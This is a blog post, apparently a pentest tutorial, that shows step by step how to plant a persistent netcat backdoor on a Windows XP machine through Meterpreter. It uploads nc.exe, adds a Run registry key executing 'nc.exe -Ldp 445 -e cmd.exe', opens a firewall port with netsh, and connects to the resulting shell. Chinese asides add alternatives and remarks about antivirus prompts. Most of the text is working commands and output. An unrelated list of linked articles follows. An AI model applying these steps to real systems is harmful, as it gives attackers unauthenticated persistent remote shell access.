In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

[*] uploading  : /tmp/nc.exe -> C:\windows\system32

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values ():

    VMware Tools

    VMware User Process

    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp  -e cmd.exe

  使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:

REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i

Process  created.

Channel  created.

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode

Netsh firewall show opmode

Domain profile configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Standard profile configuration (current):

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Local Area Connection firewall configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening

netsh firewall show portopening

Port configuration for Domain profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   Service Firewall

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128

172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [172.16.104.128]  (?) open

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim > dir

dir

Volume in drive C has no label.

Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

// : AM

.

// : AM

..

// : AM  ;i

// : PM

Desktop

// : PM

Favorites

// : PM

My Documents

// : AM  QCY

// : AM

Start Menu

// : AM  talltelnet.log

// : AM  talltftp.log

 File(s)  bytes

 Dir(s) ,,, bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

  .使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329

微信:18101055830

Persistent Netcat Backdoor的更多相关文章

  1. Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

    Microsoft Windows .Reg文件对话框消息欺骗 0day 概述 扩展名为.reg的文件是Windows注册表中使用的注册文件.这些文件可以包含hives.密钥和值..reg文件可以在文 ...

  2. Persistent Data Structures

    原文链接:http://www.codeproject.com/Articles/9680/Persistent-Data-Structures Introduction When you hear ...

  3. CodeForces #368 div2 D Persistent Bookcase DFS

    题目链接:D Persistent Bookcase 题意:有一个n*m的书架,开始是空的,现在有k种操作: 1 x y 这个位置如果没书,放书. 2 x y 这个位置如果有书,拿走. 3 x 反转这 ...

  4. coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores.

    最近在修改一个程序BUG的时候遇到一个问题coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores. 但实际跑程序 ...

  5. Exception loading sessions from persistent storage

    严重: Exception loading sessions from persistent storage java.io.EOFException 删除Tomcat里面的work/Catalina ...

  6. 【Codeforces-707D】Persistent Bookcase DFS + 线段树

    D. Persistent Bookcase Recently in school Alina has learned what are the persistent data structures: ...

  7. netcat命令

    1 简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netc ...

  8. nc 局域网聊天+文件传输(netcat)

    nc 局域网聊天+文件传输 nc的全程是netcat,这个工具非常好用. 有时候我们需要在局域网内传送一些文本消息或者文件的时候,通常的做法是安装一些局域网通讯软件,然后来做.其实不必要这样,使用nc ...

  9. POJ - 3652 Persistent Bits

    “模拟”类型,题型容易,使用bitset库对二进制逐位操作,初始化.十进制转二进制(unsigned int).位操作. POJ - 3652 Persistent Bits Time Limit:  ...

随机推荐

  1. MyEclipse使用总结——设置MyEclipse使用的Tomcat服务器

    一.设置使用的Tomcat服务器 如果不想使用MyEclipse自带的tomcat服务器版本,那么可以在MyEclipse中设置我们自己安装好的tomcat服务器 设置步骤如下: Window→Pre ...

  2. After 2 years, I have finally solved my "Slow Hyper-V Guest Network Performance" issue. I am ecstatic.

    Edit - It should be known that I was initially researching this issue back in 2012 and the solution ...

  3. 解决iframe加载的内容有时显示有时不显示

    在ASP.NET MVC项目中遇到了这样的一个问题,假设父页面有一个iframe <iframe id=" width="100%" height="10 ...

  4. 使用RemObjects Pascal Script

    摘自RemObjects Wiki 本文提供RemObjects Pascal Script的整体概要并演示如何创建一些简单的脚本. Pascal Script包括两个不同部分: 编译器 (uPSCo ...

  5. DIOCP数据包太大,请在业务层分拆发送

    DIOCP数据包太大,请在业务层分拆发送 DIOCP日志记录异常:数据包太大,请在业务层分拆发送...... 跟踪发现,原因在下图:

  6. Reflector_8.3.0.93_安装文件及破解工具

    Reflector_8.3.0.93_安装文件及破解工具 下载地址:http://pan.baidu.com/s/1jGwsYYM   约 8.9MB

  7. springMVC helloworld入门

    一.SpringMVC概述与基本原理 spring Web MVC是一种基于Java的实现了Web MVC设计模式的请求驱动类型的轻量级Web框架,即使用了MVC架构模式的思想,将web层进行职责解耦 ...

  8. 第三方包jintellitype实现Java设置全局热键

    Java原生API并不支持为应用程序设置全局热键.要实现全局热键,需要用JNI方式实现,这就涉及到编写C/C++代码,这对于大多数不熟悉C /C++的javaer来说,有点困难.不过幸好,国外有人已经 ...

  9. 加州靡情第一至七季/全集Californication迅雷下载

    加州靡情 第一至七季 Californication Season 1-7 (2007-2014)本季看点:2007-2014,7季,84集.电视圈一直有个怪现象,有许多演员在非常成功剧集完结之后,反 ...

  10. 推荐一款移动端的web UI控件 -- mobiscroll

    用mobiscroll 可实现ios系统自带的选择器控件效果,支持几乎所有的移动平台(iOS, Android, BlackBerry, Windows Phone 8, Amazon Kindle) ...